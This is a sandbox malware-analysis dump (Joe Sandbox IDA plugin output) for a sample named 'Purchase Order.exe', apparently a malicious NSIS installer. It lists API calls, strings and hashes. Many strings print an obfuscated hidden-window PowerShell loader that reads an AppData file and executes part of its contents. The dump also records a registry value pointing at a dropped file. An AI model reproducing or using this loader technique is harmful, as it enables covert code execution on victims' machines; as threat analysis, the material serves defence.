                                                          • FindFirstFileA.KERNELBASE(75923410,0042B0B8,0042AC70,004058D2,0042AC70,0042AC70,00000000,0042AC70,0042AC70,75923410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75923410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
                                                          • FindClose.KERNELBASE(00000000), ref: 0040604A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                          • Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
                                                          • Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                          • Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE
                                                          APIs
                                                          • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402697
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: c726fce334b162bffbc1a7bc3135fcd734087509c80d7b9bc143c566e0aa852e
                                                          • Instruction ID: 3dffafe4ea1a5cbb8d5ba181f96d08faa62a405c2aca3b81b81ef469795ec413
                                                          • Opcode Fuzzy Hash: c726fce334b162bffbc1a7bc3135fcd734087509c80d7b9bc143c566e0aa852e
                                                          • Instruction Fuzzy Hash: 7AF0A0326081049FE701EBA49949AEEB7789F21324F60057BE241A21C1D7B84985AB3A

                                                           Control-flow Graph
                                                           Function at 403a41 (rendered graph omitted; legend: Executed / Not Executed). Blocks 403a41-403eea; API calls SetWindowPos, ShowWindow, DestroyWindow, SetWindowLongA, GetDlgItem, SendMessageA, IsWindowEnabled, SetClassLongA, KiUserCallbackDispatcher, EnableWindow, GetSystemMenu, EnableMenuItem, lstrlenA, SetWindowTextA, EndDialog, CreateDialogParamA, GetWindowRect, ScreenToClient; internal calls 403f14, 40140b, 403f60, 401389, 403f7b, 403eed, 405d51, 403f36, 403f49, 405d2f.
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
                                                          • ShowWindow.USER32(?), ref: 00403A9A
                                                          • DestroyWindow.USER32 ref: 00403AAE
                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
                                                          • GetDlgItem.USER32(?,?), ref: 00403AEB
                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403B06
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403BB4
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403BBE
                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403CCF
                                                          • ShowWindow.USER32(00000000,?), ref: 00403CF0
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
                                                          • EnableWindow.USER32(?,?), ref: 00403D1D
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
                                                          • EnableMenuItem.USER32(00000000), ref: 00403D3A
                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
                                                          • lstrlenA.KERNEL32(Misguidingly Setup: Installing,?,Misguidingly Setup: Installing,Misguidingly Setup), ref: 00403D8E
                                                          • SetWindowTextA.USER32(?,Misguidingly Setup: Installing), ref: 00403D9D
                                                          • ShowWindow.USER32(?,0000000A), ref: 00403ED1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID: Misguidingly Setup$Misguidingly Setup: Installing
                                                          • API String ID: 3282139019-3485224092
                                                          • Opcode ID: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                          • Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
                                                          • Opcode Fuzzy Hash: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                          • Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E

                                                           Control-flow Graph
                                                           Function at 4036af (rendered graph omitted; legend: Executed / Not Executed). Blocks 4036af-403973; API calls lstrcatA, lstrlenA, lstrcmpiA, GetFileAttributesA, LoadImageA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, ShowWindow, GetClassInfoA, DialogBoxParamA; internal calls 4060c8, 405c8d, 405c16, 403974, 40588f, 405d51, 4057cc, 4057a1, 405d2f, 4057e8, 40140b, 40501a, 40605a, 4035ff.
                                                          APIs
                                                            • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                            • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                          • lstrcatA.KERNEL32(1033,Misguidingly Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Misguidingly Setup: Installing,00000000,00000002,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order.exe",00000000), ref: 0040372A
                                                          • lstrlenA.KERNEL32(Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Local\potentially,1033,Misguidingly Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Misguidingly Setup: Installing,00000000,00000002,75923410), ref: 0040379F
                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
                                                          • GetFileAttributesA.KERNEL32(Execute: ), ref: 004037BD
                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\potentially), ref: 00403806
                                                            • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                          • RegisterClassA.USER32(0042DBA0), ref: 00403843
                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
                                                          • ShowWindow.USER32(00000005,00000000), ref: 004038C6
                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
                                                          • GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
                                                          • RegisterClassA.USER32(0042DBA0), ref: 00403908
                                                          • DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\potentially$Control Panel\Desktop\ResourceLocale$Execute: $Misguidingly Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                          • API String ID: 1975747703-20137999

                                                          Control-flow Graph (function at 402c66; graph not reproduced)
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402C77
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order.exe,00000400), ref: 00402C93
                                                            • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 004059A6
                                                            • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                          • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order.exe,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 00402CDF
                                                          Strings
                                                          • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                          • "C:\Users\user\Desktop\Purchase Order.exe", xrefs: 00402C66
                                                          • C:\Users\user\Desktop\Purchase Order.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                          • Error launching installer, xrefs: 00402CB6
                                                          • soft, xrefs: 00402D54
                                                          • Inst, xrefs: 00402D4B
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                          • Null, xrefs: 00402D5D
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                          Similarity
                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                          • API String ID: 4283519449-2237096297

                                                          Control-flow Graph (function at 401751; graph not reproduced)
                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",C:\Users\user\AppData\Local\potentially\Avantgarders,00000000,00000000,00000031), ref: 00401790
                                                          • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)","powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,00000000,"powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",C:\Users\user\AppData\Local\potentially\Avantgarders,00000000,00000000,00000031), ref: 004017BA
                                                            • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Misguidingly Setup,NSIS Error), ref: 00405D3C
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                            • Part of subcall function 00404F48: lstrcatA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00402FFA,00402FFA,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0), ref: 00404FA4
                                                            • Part of subcall function 00404F48: SetWindowTextA.USER32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"), ref: 00404FB6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                          Strings
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"$"powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"$C:\Users\user\AppData\Local\potentially\Avantgarders$C:\Users\user\Documents\bevisliggrelser.hen$C:\Users\user\depecher.fum->C:\Users\user\Documents\bevisliggrelser.hen
                                                          • API String ID: 1941528284-1279281401

                                                          Control-flow Graph (function at 402e9f; graph not reproduced)
                                                          APIs
                                                          Strings
                                                          • EA, xrefs: 00402F73, 00402F85
                                                          • probere sydover cannabisens humpendes tupanship utriculariaceaenatbordsskuffers amortization clasped nonruinously rusgift sulphazotize ruinatiousndsignaler unbeloved gruedes nonliteracy modefolkenessstjernerne runden scribbling frdselslreres pulverisers , xrefs: 00402F20
                                                          • DA, xrefs: 00403060
                                                          • DA, xrefs: 00402F5C
                                                          • ... %d%%, xrefs: 00402FE0
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: EA$ DA$ DA$... %d%%$probere sydover cannabisens humpendes tupanship utriculariaceaenatbordsskuffers amortization clasped nonruinously rusgift sulphazotize ruinatiousndsignaler unbeloved gruedes nonliteracy modefolkenessstjernerne runden scribbling frdselslreres pulverisers
                                                          • API String ID: 551687249-3082942608

                                                          Control-flow Graph (function at 404f48; graph not reproduced)
                                                          APIs
                                                          • lstrlenA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                          • lstrlenA.KERNEL32(00402FFA,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                          • lstrcatA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00402FFA,00402FFA,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0), ref: 00404FA4
                                                          • SetWindowTextA.USER32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"), ref: 00404FB6
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                          Strings
                                                          • Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)", xrefs: 00404F68, 00404F7A, 00404F80, 00404FA3, 00404FAF
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID: Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"
                                                          • API String ID: 2531174081-293989933
                                                          • Opcode ID: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                          • Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
                                                          • Opcode Fuzzy Hash: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                          • Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8

                                                          Control-flow Graph

                                                          control_flow_graph 698 40605a-40607a GetSystemDirectoryA 699 40607c 698->699 700 40607e-406080 698->700 699->700 701 406090-406092 700->701 702 406082-40608a 700->702 704 406093-4060c5 wsprintfA LoadLibraryExA 701->704 702->701 703 40608c-40608e 702->703 703->704
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                          • wsprintfA.USER32 ref: 004060AA
                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%s.dll$UXTHEME$\
                                                          • API String ID: 2200240437-4240819195
                                                          • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                          • Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
                                                          • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                          • Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69

                                                          Control-flow Graph

                                                          control_flow_graph 705 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 712 4023b0-4023b8 705->712 713 4028cf-4028de 705->713 714 4023c8-4023cb 712->714 715 4023ba-4023c7 call 402a3a lstrlenA 712->715 719 4023db-4023de 714->719 720 4023cd-4023da call 402a1d 714->720 715->714 721 4023e0-4023ea call 402e9f 719->721 722 4023ef-402403 RegSetValueExA 719->722 720->719 721->722 726 402405 722->726 727 402408-4024de RegCloseKey 722->727 726->727 727->713
                                                          APIs
                                                          • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                          • lstrlenA.KERNEL32(C:\Users\user\Documents\bevisliggrelser.hen,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                          • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\Documents\bevisliggrelser.hen,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\Documents\bevisliggrelser.hen,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID: C:\Users\user\Documents\bevisliggrelser.hen
                                                          • API String ID: 1356686001-1664747475
                                                          • Opcode ID: d2cc6d77e9ba14248a047d72dd7d9f6a3aa8facb63e6006dd0d76643cfd04d8e
                                                          • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                          • Opcode Fuzzy Hash: d2cc6d77e9ba14248a047d72dd7d9f6a3aa8facb63e6006dd0d76643cfd04d8e
                                                          • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28

                                                          Control-flow Graph

                                                          control_flow_graph 730 4059d1-4059db 731 4059dc-405a07 GetTickCount GetTempFileNameA 730->731 732 405a16-405a18 731->732 733 405a09-405a0b 731->733 735 405a10-405a13 732->735 733->731 734 405a0d 733->734 734->735
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004059E5
                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF
                                                          Strings
                                                          • "C:\Users\user\Desktop\Purchase Order.exe", xrefs: 004059D1
                                                          • nsa, xrefs: 004059DC
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
